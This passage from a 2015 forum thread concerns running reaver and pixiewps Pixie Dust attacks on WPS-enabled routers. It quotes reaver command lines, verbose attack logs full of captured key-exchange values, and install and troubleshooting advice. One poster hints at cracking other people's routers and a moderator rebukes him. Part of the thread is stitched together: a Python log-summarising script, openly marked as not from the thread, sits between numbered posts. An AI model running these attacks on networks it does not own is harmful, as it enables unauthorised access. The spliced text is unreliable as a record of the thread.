2c:ed:7a:66:54:84:55:80:ae:28:52:78:7a:bb:41:a8:37:42:bf:fc:cf:2e:cd:4d:53:86:06:0c:0b:79:85:19 -z 8a:d4:8e:83:e0:00:34:99:78:c5:2b:92:11:ff:f6:ae:18:1f:15:1a:da:f7:5d:41:44:8f:ef:00:26:75:38:0a -a db:a5:68:39:87:53:fa:7a:1c:2a:ce:3f:f9:c8:5d:de:8b:63:e8:c6:b8:97:18:04:30:3a:90:7a:1f:aa:20:80 -n 45:7b:18:6c:14:80:7e:17:7f:d6:22:84:43:74:49:ad -f 
    
     Pixiewps 1.1
    
     [-] WPS pin not found!
    [*] Time taken: 16902 s
    
    root@bt:~#
    Last edited by Saydamination; 2015-05-04 at 19:18.

  40. #90
    Hi,

    I cannot install pixiewps, I get the following message:

    gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
    In file included from pixiewps.c:51:0:
    pixiewps.h:66:25: fatal error: openssl/sha.h: No such file or directory
    compilation terminated.
    make: *** [all] Error 1

    I tried this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto, and also the recommendation given by mmusket33, but I still have the same problem. I would really appreciate it if anybody could help me... Thanks in advance.

  41. #91
    @KIMW

    pixiewps is now in the official Kali repo; you can install it with "apt-get install pixiewps"

  42. #92
    If your Kali has been updated as of today, May 7, do you have the necessary tools installed and updated to successfully do the pixiewps attack? I have been testing my routers with WPS enabled and the firewall turned off etc. with no luck; I had some luck on a friend's D-Link when I used the pin, but it did not spit out the key. I am attaching what I seem to always get on my Broadcom and ASUS; the Zyxel just won't work at all. I am trying both adapters, the 36NEH and the 51NH, with no luck. It especially never spits out the hashes (E-Hash1 and E-Hash2) during the transaction. I am thinking I might have a bad installation of something. I have played around with trying different options as well, and also read through many tutorials which show people always getting E-Hash1 and E-Hash2, which I never seem to get; maybe all the routers I try are not supported to spit those out....

    root@kali:~# time reaver -i wlan1mon -c 11 -b A8:39:44:41:10:E0 -K 1 -vv

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212

    [+] Switching wlan1mon to channel 11
    [+] Waiting for beacon from A8:39:44:41:10:E0
    [+] Associated with A8:39:44:41:10:E0 (ESSID: mil0)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: d5:06:2e:f0:0b:f1:39:03:f3:e5:df:fe:c1:9f:cc:fb
    [P] PKE: 90:02:ed:eb:04:1b:a3:6a:b4:2a:7f:1b:79:c2:d9:ad:e2 :c2:3b:ab:ff:fa:82:27:c7:2f:e7:6a:91:0f:51:2d:20:e c:9d:02:f7:41:39:b4:c7:be:de:ca:8d:26:0e:af:19:a3: 8a:e4:84:cc:69:02:e8:f9:ec:15:a0:e2:87:32:0c:54:c6 :1c:4e:19:3d:25:02:49:fe:59:25:66:38:83:22:19:23:a a:f5:90:2e:41:b1:53:c4:68:94:ee:ea:a5:f0:4c:d8:d9: ec:c0:1b:85:0c:64:2f:3f:fd:6d:4b:1d:4f:2c:ea:1b:d0 :dd:ee:e5:85:ae:d5:ca:61:05:b0:8a:1d:23:df:b1:b6:f 3:6d:04:78:cd:14:c2:c2:80:48:54:4e:4c:77:91:9e:41: b9:65:94:5f:e9:06:6d:8f:90:d3:28:ff:f0:b7:2e:78:e3 :93:b6:ef:b1:26:43:b0:45:c5:0a:1a:be:20:6c:a5:3c:b e:3b:7e:2c:5e:a1:0b:19:b1
    [P] WPS Manufacturer: Broadcom
    [P] WPS Model Name: Broadcom
    [P] WPS Model Number: 123456
    [P] Access Point Serial Number: 1234
    [+] Received M1 message
    [P] R-Nonce: b0:e6:b2:95:77:cf:66:23:a3:89:be:19:c0:fb:4e:78
    [P] PKR: d5:c1:6b:bf:ff:50:8e:67:99:8c:d0:70:1f:7f:1f:60:12 :0b:a8:e3:84:a6:6d:1b:30:1a:81:94:e2:4d:3b:17:bc:d 3:db:64:7b:70:a7:1d:4b:05:2b:1e:39:03:92:79:63:a7: 56:0e:36:7d:af:89:27:7b:95:93:61:8f:e1:a5:b3:db:d1 :a8:6c:fa:05:1a:27:e6:20:18:1c:ed:ca:32:e3:4c:8e:6 1:fd:a2:31:18:6c:80:c8:ad:48:a2:d6:c7:30:6d:24:a1: 35:c1:7b:17:9c:72:e6:f9:67:d7:0b:0e:f6:19:24:58:67 :06:db:a0:23:a5:3e:f2:e8:de:e9:c4:d1:02:68:f9:76:f 6:83:c6:3d:d1:de:7b:fe:46:6b:aa:ca:e9:53:a9:d5:ca: 91:52:a7:08:ed:b1:92:4e:b3:b8:50:3c:32:fd:81:7f:bb :ca:b2:bf:8a:c7:ef:d8:3c:6d:0a:1d:9b:fa:a1:41:38:6 3:f7:a9:9a:4f:47:38:37:de
    [P] AuthKey: 53:60:51:4a:9f:af:ad:6b:10:5f:2a:fc:85:d4:f3:38:fc :88:2e:dc:52:f8:f4:5a:de:ee:90:e3:5d:3f:a9:96
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received M3 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670.
    ^C
    [+] Nothing done, nothing to save.

    real 0m13.437s
    user 0m0.260s
    sys 0m0.052s
    With the Asus N56U:

    [+] Associated with E0:3F:49:E3:73:71 (ESSID: MILLA)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
    [!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
    [!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [P] E-Nonce: 0f:c9:4f:ac:5d:27:4c:06:13:74:6f:05:fc:ec:bb:19
    [P] PKE: ca:dc:10:7d:43:a3:ce:9a:9d:7f:0a:45:0f:bf:10:15:30 :6b:83:09:f2:d4:69:37:0a:eb:97:c7:27:56:63:70:a0:6 4:49:11:09:f0:39:3e:af:e9:e3:74:d2:2e:76:2b:52:b4: f6:87:a8:da:26:2c:dc:1a:d9:25:29:03:51:4e:3a:99:49 :32:14:62:8e:73:35:31:4c:21:fa:e7:a7:84:de:98:95:f 1:dc:f7:23:ff:25:d6:b7:fb:c8:0d:52:67:5f:11:96:bf: a3:d4:08:b3:99:7e:51:37:1a:46:4b:a6:6d:88:e1:56:c4 :a5:84:61:1a:a0:e4:f8:db:5c:ab:78:a9:0c:0c:d1:2c:8 e:67:0e:5f:37:ce:07:00:50:6d:6b:d9:e1:df:4c:6b:e2: 3c:f9:f5:85:84:67:54:56:79:61:84:d7:a0:b9:2c:14:02 :33:54:24:68:21:f5:e0:22:6c:00:b4:b3:5d:58:9e:49:9 2:85:06:cf:10:16:c3:3c:e8
    [P] WPS Manufacturer: ASUSTeK Computer Inc.
    [P] WPS Model Name: WPS Router
    [P] WPS Model Number: RT-N56U
    [P] Access Point Serial Number: 00000000
    [+] Received M1 message
    [P] R-Nonce: dd:00:db:6e:84:39:cd:26:d1:7c:bb:42:fa:f6:6b:cf
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
    [P] AuthKey: 6a:1e:35:9e:61:a6:13:8b:f9:b5:d1:33:b8:fa:07:e7:10 :80:20:76:9b:1e:d2:15:9e:8e:46:35:d1:65:2b:a8
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    Should it be sending M3 msg?
    Last edited by undersc0re; 2015-05-07 at 16:55.
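Added example, not from the thread and not part of reaver or pixiewps: a small Python summarizer for reaver-style -vv logs like the ones quoted above. It splits the log into per-PIN attempts and reports whether M3 (the message that carries E-Hash1/E-Hash2) was ever reached, so someone testing their own router can see where the exchange stopped. The log text is constructed, and the regexes assume the "[+] Received M1 message" / "[+] Sending M2 message" wording shown in the posts.

```python
import re

# Constructed sample in the shape of reaver -vv output (made-up values, two attempts).
SAMPLE_LOG = """\
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[P] E-Hash1: 0a:0b:0c:0d:0e:0f:10:11:12:13:14:15:16:17:18:19:1a :1b:1c:1d:1e:1f:20:21:22:23:24:25:26:27:28:29
[+] Sending M4 message
"""

MSG_RE = re.compile(r"\[\+\] (Received|Sending) (M[1-8]) message")
PARAM_RE = re.compile(r"\[P\] (.+?): (.*)")
FAIL_RE = re.compile(r"failed \(code: (0x[0-9a-fA-F]+)\)")

def summarize_attempts(log_text):
    # One record per "[+] Trying pin" block: message order, [P] fields, failure code.
    attempts, cur = [], None
    for line in log_text.splitlines():
        line = line.strip()
        if line.startswith("[+] Trying pin "):
            cur = {"pin": line.split()[3].rstrip("."), "seq": [], "params": {}, "fail_code": None}
            attempts.append(cur)
        elif cur is None:
            continue  # banner / association lines before the first attempt
        elif m := MSG_RE.match(line):
            cur["seq"].append(("in" if m.group(1) == "Received" else "out", m.group(2)))
        elif m := PARAM_RE.match(line):
            cur["params"][m.group(1)] = m.group(2).replace(" ", "")  # undo forum line-wrapping
        elif m := FAIL_RE.search(line):
            cur["fail_code"] = m.group(1)
    return attempts

def diagnose(attempt):
    # Where did this attempt stop? E-Hash1/E-Hash2 only arrive in M3.
    seq = attempt["seq"]
    if ("in", "M3") in seq and "E-Hash1" in attempt["params"]:
        return "M3 received: E-Hash1 present"
    if ("out", "M2") in seq and ("in", "M1") in seq[seq.index(("out", "M2")) + 1:]:
        return "AP sent a fresh M1 after M2, so no M3 (hashes) arrived"
    return "failed with code %s before M3" % attempt["fail_code"] if attempt["fail_code"] else "no failure recorded"
```

Run over the quoted Broadcom log, the first attempt reads as "fresh M1 after M2", which is why no E-Hash1/E-Hash2 lines ever appear.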

  43. #93
    Apparently you are too far from the router to communicate properly with it.

    Try to get closer to the router.

  44. #94
    Quote Originally Posted by t6_x View Post
    Apparently you are too far from the router to communicate properly with it.

    Try to get closer to the router.
    The Broadcom was in the basement and the Asus on the same table as my computer, but I will continue to test and keep trying! The only time I had a better response was getting the pins for a -W against my friend's D-Link router and trying them, and then it only failed in the end as it was unable to retrieve the passphrase. I will troubleshoot some more; I am sure it is something simple I am overlooking. Thanks for your input though. Is it OK to ask these questions here, or should I be in an IRC channel or a different forum area?

  45. #95
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by undersc0re View Post
    The Broadcom was in the basement and the Asus on the same table as my computer, but I will continue to test and keep trying! The only time I had a better response was getting the pins for a -W against my friend's D-Link router and trying them, and then it only failed in the end as it was unable to retrieve the passphrase. I will troubleshoot some more; I am sure it is something simple I am overlooking. Thanks for your input though. Is it OK to ask these questions here, or should I be in an IRC channel or a different forum area?
    It would be preferred to put it on the Reaver thread.
    Last edited by soxrok2212; 2015-05-10 at 11:55.

  46. #96
    Join Date
    2015-Apr
    Posts
    9
    Thanks for your Pixiewps 1.1. Now the TD5130 V1 works and V2 works, but V3 does not work, and neither does the Thomson router.

  47. #97
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by iliass View Post
    Thanks for your Pixiewps 1.1. Now the TD5130 V1 works and V2 works, but V3 does not work, and neither does the Thomson router.
    Dude, we're not here to hack all your neighbors' wireless; it's meant for you to test your own network, and it's clear that you are not using it explicitly for that.

  48. #98
    About the -f, --force option...
    I tried to find my pin with the -f option, but it was not found. Realtek chipset.
    It searched the PRNG between the years 2015 and 1971....

    I want to ask..

    Maybe the PRNG is set between the years 2015 and 2038?? Because the PRNG time seed finishes at 01.01.2038..

    Or a larger time, 1901?

    Is it possible?

    Another question..

    If I set my system time to 1901... is it running 1971? Or an error?

  49. #99
    Quote Originally Posted by soxrok2212 View Post
    Dude, we're not here to hack all your neighbors' wireless; it's meant for you to test your own network, and it's clear that you are not using it explicitly for that.
    Experience is something you don't get until just after you need it.

  50. #100
    Join Date
    2013-Jul
    Posts
    844
    Musket Teams have released their lab version of the Pixie Dust Data Sequence Analyzer, PDDSA-06.sh, for general use. This script requires the installation of pixiedust1.1 by wiire and has been updated to allow for the more advanced features of version 1.1, such as brute forcing the WPS pin.

    PDDSA-06.sh supports the latest modded Reaver program from t6_x, datahead and soxrok2212 as of 11 May 15.

    You can download at:

    http://www.datafilehost.com/d/a30c5b3d

    or from the attachment at the link below.


    http://forum.aircrack-ng.org/index.p...ic=868.msg2904


    Older versions of the modded Reaver program are not supported.

    MTeams
    Last edited by mmusket33; 2015-05-11 at 12:10.
